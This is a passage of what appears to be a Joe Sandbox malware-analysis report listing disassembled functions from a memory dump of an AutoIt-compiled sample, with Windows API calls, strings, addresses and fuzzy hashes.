Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00951B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0095194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00951B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 009519D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00951B7B,?,00951B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00951A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00951B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00951A7B

Part of subcall function 00943B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00936A79,?,0000015D,?,?,?,?,009385B0,000000FF,00000000,?,?), ref: 00943BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00951B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00951AF7
__freea.LIBCMT ref: 00951B22
__freea.LIBCMT ref: 00951B2E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 7de83f9f84484a7352fd3efcf07662e17d3e6d5fbb699e15b7a3977c505ef0a8
Instruction ID: 62442f00c1327f71709784f64495195e786843982af6c4afba5238af23b75c27
Opcode Fuzzy Hash: 7de83f9f84484a7352fd3efcf07662e17d3e6d5fbb699e15b7a3977c505ef0a8
Instruction Fuzzy Hash: BA91E472E002169ADB25CEB6D8A1FEE7BB9EF49311F180619EC11E7140E735CD48CB60

Function 00994F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009950A5
VariantInit.OLEAUT32(?), ref: 009951A6
VariantClear.OLEAUT32(?), ref: 009951B0
VariantClear.OLEAUT32(?), ref: 0099520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00995189
Null Object assignment in FOR..IN loop, xrefs: 00995035, 00995163, 0099521B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 46b49084af876ea868a524f63fb0e9c8c080dbe3fd860011d92fd3b41387a02c
Instruction ID: f660658239116db061ffda8a1bc322f84cd0a5c1e743bed32268f541502a33ab
Opcode Fuzzy Hash: 46b49084af876ea868a524f63fb0e9c8c080dbe3fd860011d92fd3b41387a02c
Instruction Fuzzy Hash: B191BF70A04619ABDF25CFA8CC88FAFBBB8EF85714F118519F515AB280D7709945CFA0

Function 00981B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00981C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00981C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00981C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00981C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00981D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00981D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00981DEF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 3d7febd527d536771763a1eb4c9d346135ac95c8efb9b0e5fea0b65f138a316d
Instruction ID: 481fbb30d64dd819774d90ca08c7bddcd6e2fa7c666b05226589e79facb23f1a
Opcode Fuzzy Hash: 3d7febd527d536771763a1eb4c9d346135ac95c8efb9b0e5fea0b65f138a316d
Instruction Fuzzy Hash: BA91DF75A00219AFDB01AF94C885BFEB7BCFF45711F104429E951EB3A1D774A942CB90

Function 009943A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009943C8
CharUpperBuffW.USER32(?,?), ref: 009944D7
_wcslen.LIBCMT ref: 009944E7
VariantClear.OLEAUT32(?), ref: 0099467C

Part of subcall function 0098169E: VariantInit.OLEAUT32(00000000), ref: 009816DE
Part of subcall function 0098169E: VariantCopy.OLEAUT32(?,?), ref: 009816E7
Part of subcall function 0098169E: VariantClear.OLEAUT32(?), ref: 009816F3

Strings

AUTOIT.ERROR, xrefs: 009944DD, 009944E2
Incorrect Parameter format, xrefs: 00994403, 009945FE

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: a06b0ae72156a98f1a12f14123c7b4af07c704dde2fef2301eb7ae2ac8be26b4
Instruction ID: 930f054c033cbb2cae2e0bfb796d5fd2644eef6c6d473167b73b874f81f8d58c
Opcode Fuzzy Hash: a06b0ae72156a98f1a12f14123c7b4af07c704dde2fef2301eb7ae2ac8be26b4
Instruction Fuzzy Hash: 1F916A746083059FCB04EF68C480A6AB7E9FF89714F14892DF48A97351DB31ED46CB92

Function 0099560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 009708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?,?,00970C4E), ref: 0097091B
Part of subcall function 009708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?), ref: 00970936
Part of subcall function 009708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?,?), ref: 00970944
Part of subcall function 009708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00970831,80070057,?), ref: 00970954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 009956AE
_wcslen.LIBCMT ref: 009957B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0099582C
CoTaskMemFree.OLE32(?), ref: 00995837

Strings

NULL Pointer assignment, xrefs: 00995880, 009958AF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 24c7af38e1850da9573f4b165d0b09a0db436358dc365e98cb216c1f1dedd5fd
Instruction ID: 64673e4077140d9c6d8ec2f7ac3d3be21e8c45271648b6e81e1cef6f62f0d106
Opcode Fuzzy Hash: 24c7af38e1850da9573f4b165d0b09a0db436358dc365e98cb216c1f1dedd5fd
Instruction Fuzzy Hash: BA912771D0021DEFDF15DFA8D881AEEB7B9BF48304F10456AE919A7251EB349A44CFA0

Function 009A2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 009A2C1F
GetMenuItemCount.USER32(00000000), ref: 009A2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009A2C79
_wcslen.LIBCMT ref: 009A2CAF
GetMenuItemID.USER32(?,?), ref: 009A2CE9
GetSubMenu.USER32(?,?), ref: 009A2CF7

Part of subcall function 00974393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009743AD
Part of subcall function 00974393: GetCurrentThreadId.KERNEL32 ref: 009743B4
Part of subcall function 00974393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00972F00), ref: 009743BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009A2D7F

Part of subcall function 0097F292: Sleep.KERNEL32 ref: 0097F30A

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 225c7a482d2802e799c9f44d4fc82b81d0df01d61967a13d9fb05b2f502ec477
Instruction ID: 921beb50ea0ebb422c9982634d55e57c819494cfdf0626ce119ea2219f829534
Opcode Fuzzy Hash: 225c7a482d2802e799c9f44d4fc82b81d0df01d61967a13d9fb05b2f502ec477
Instruction Fuzzy Hash: 71715F75E00205AFCB14EF68C845BAEB7F5EF89320F158859E856AB351DB34ED41CB90

Function 009A88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009A8992
IsWindowEnabled.USER32(00000000), ref: 009A899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 009A8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 009A8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 009A8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 009A8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009A8B1E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: de184e77efc1f933d7b0950b4654f12a0eefae9c03b798dc841c4cfe79732c53
Instruction ID: a844d534ffea848808f7cbf345e5f57f8764c689d1bafe899d72dd1c6e840c43
Opcode Fuzzy Hash: de184e77efc1f933d7b0950b4654f12a0eefae9c03b798dc841c4cfe79732c53
Instruction Fuzzy Hash: E671AE74604204AFDB25DF54C885FBBBBB9FF4B300F14445AE855A7261CB31AD81DBA1

Function 0097B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0097B8C0
GetKeyboardState.USER32(?), ref: 0097B8D5
SetKeyboardState.USER32(?), ref: 0097B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 0097B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 0097B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 0097B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0097B9E7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5d79b253bdd23b7340d84debd1f12bfd865c424f17ffb55edc9b8c5409591be1
Instruction ID: ee9c7a15f18f2a1616c1f7770a5fcf8ee2d2e32b07ccf0d68b2e0fbce5d3cf64
Opcode Fuzzy Hash: 5d79b253bdd23b7340d84debd1f12bfd865c424f17ffb55edc9b8c5409591be1
Instruction Fuzzy Hash: 6651D0A26087D53EFB3642348C55BBABEAD5F06708F08C489E2ED468D2D3D8ADC4D751

Function 0097B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0097B6E0
GetKeyboardState.USER32(?), ref: 0097B6F5
SetKeyboardState.USER32(?), ref: 0097B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0097B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0097B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0097B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0097B7FF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 67a358100bf066e3e9921ef5af34d91cc201f023b852f1645f5a649da711b9ad
Instruction ID: 35e0ed2a5e68957614ff3c8999d949cb518ca923bddc83595e4484b5a5a890c4
Opcode Fuzzy Hash: 67a358100bf066e3e9921ef5af34d91cc201f023b852f1645f5a649da711b9ad
Instruction Fuzzy Hash: 9D51F0A29087D53EFB368224CC55BBABEAD6F46704F0CC489E1DD4A8C2D394EC84E751

Function 009457A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00945F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 009457E3
__fassign.LIBCMT ref: 0094585E
__fassign.LIBCMT ref: 00945879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0094589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00945F16,00000000,?,?,?,?,?,?,?,?,?,00945F16,?), ref: 009458BE
WriteFile.KERNEL32(?,?,00000001,00945F16,00000000,?,?,?,?,?,?,?,?,?,00945F16,?), ref: 009458F7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 2cf81af59b8da8edca569858cd0b7b4b7cfeb5ac0ee856873fb7d7b3c86d4d5f
Instruction ID: a9243382ced906eb9654b8db8c64cd35a2950e853eb066969b1cedaf8d310f9a
Opcode Fuzzy Hash: 2cf81af59b8da8edca569858cd0b7b4b7cfeb5ac0ee856873fb7d7b3c86d4d5f
Instruction Fuzzy Hash: 7F519F71A046499FDB10CFA8D885EEEBBB8EF09320F15451AE956E7292D7309D41CBA0

Function 00933090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 009330BB
___except_validate_context_record.LIBVCRUNTIME ref: 009330C3
_ValidateLocalCookies.LIBCMT ref: 00933151
__IsNonwritableInCurrentImage.LIBCMT ref: 0093317C
_ValidateLocalCookies.LIBCMT ref: 009331D1

Strings

csm, xrefs: 00933166

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: de23aceec49d842fd2792ca1c32b2c93d82c3fd7dae64fca5cdd80e6d62a3cf1
Instruction ID: 730ef7723207da12f937a1aa5cb662f653bc3e81bf4fc62a2e4be88611d8450e
Opcode Fuzzy Hash: de23aceec49d842fd2792ca1c32b2c93d82c3fd7dae64fca5cdd80e6d62a3cf1
Instruction Fuzzy Hash: F1419F34A582089BCF10DFA8C885BAEBBB9AF85324F14C155EC15AB392D735DB05CF91

Function 00991B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00993AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00993AD7
Part of subcall function 00993AAB: _wcslen.LIBCMT ref: 00993AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00991B6F
WSAGetLastError.WSOCK32 ref: 00991B7E
WSAGetLastError.WSOCK32 ref: 00991C26
closesocket.WSOCK32(00000000), ref: 00991C56

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: b695711c9bfecb22433501454bb4bea461a4189fdcca6e66405747739a9ab5d9
Instruction ID: a64b197b6790991edc7a663f681e5393b4008efbaff0543f49787ffafa33d0e4
Opcode Fuzzy Hash: b695711c9bfecb22433501454bb4bea461a4189fdcca6e66405747739a9ab5d9
Instruction Fuzzy Hash: 8241F671600115AFDF109F28C844BA9BBE9FF85324F148059FC569B292D774ED81CBE1

Function 0097D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0097E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0097D7CD,?), ref: 0097E714

Part of subcall function 0097E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0097D7CD,?), ref: 0097E72D

lstrcmpiW.KERNEL32(?,?), ref: 0097D7F0
MoveFileW.KERNEL32(?,?), ref: 0097D82A
_wcslen.LIBCMT ref: 0097D8B0
_wcslen.LIBCMT ref: 0097D8C6
SHFileOperationW.SHELL32(?), ref: 0097D90C

Strings

\*.*, xrefs: 0097D89E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: b24009e32dbdbe821a4771112a8ed07f929cf71a4302772667b2e55cf32e32f9
Instruction ID: d00c28e4a32be6c3b477fbfd25c7d6fc08b24bbca74f5402c72695b2f8334d0e
Opcode Fuzzy Hash: b24009e32dbdbe821a4771112a8ed07f929cf71a4302772667b2e55cf32e32f9
Instruction Fuzzy Hash: 9F4166729062189EDF12EBA4C981FDE77BCAF49340F1044EAA50DEB141EB35A788CB51

Function 009A3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 009A38B8
GetWindowLongW.USER32(?,000000F0), ref: 009A38EB
GetWindowLongW.USER32(?,000000F0), ref: 009A3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 009A3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 009A397C
GetWindowLongW.USER32(?,000000F0), ref: 009A398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 009A39A7

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 7c796551f00971e27b03a4eaec99f2aa7582d748be639611df94ed021ef7b9dd
Instruction ID: 05d16329dd735324856e45376300013563ed50addc6d5c243e16f8ac35b8ff5f
Opcode Fuzzy Hash: 7c796551f00971e27b03a4eaec99f2aa7582d748be639611df94ed021ef7b9dd
Instruction Fuzzy Hash: CA314470659281EFDB218F48DC84F6937A8FB8A310F1551A4F5158F2B2CB74AD44EB81

Function 0097808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009780D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009780F6
SysAllocString.OLEAUT32(00000000), ref: 009780F9
SysAllocString.OLEAUT32(?), ref: 00978117
SysFreeString.OLEAUT32(?), ref: 00978120
StringFromGUID2.OLE32(?,?,00000028), ref: 00978145
SysAllocString.OLEAUT32(?), ref: 00978153

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9fe9ae3b839b369a57db5a072aa87220c08089bd27ba596bc47f2fa4839569fe
Instruction ID: d8ffd14a5edebde7fefa05e31c52bda1465b47913076be62d3f631be8fdbf038
Opcode Fuzzy Hash: 9fe9ae3b839b369a57db5a072aa87220c08089bd27ba596bc47f2fa4839569fe
Instruction Fuzzy Hash: C7219572609219AF9F10DFA8CC88DBB77ECEF093647448425F909DB2A0DB74DD4697A0

Function 00978164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009781A9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009781CF
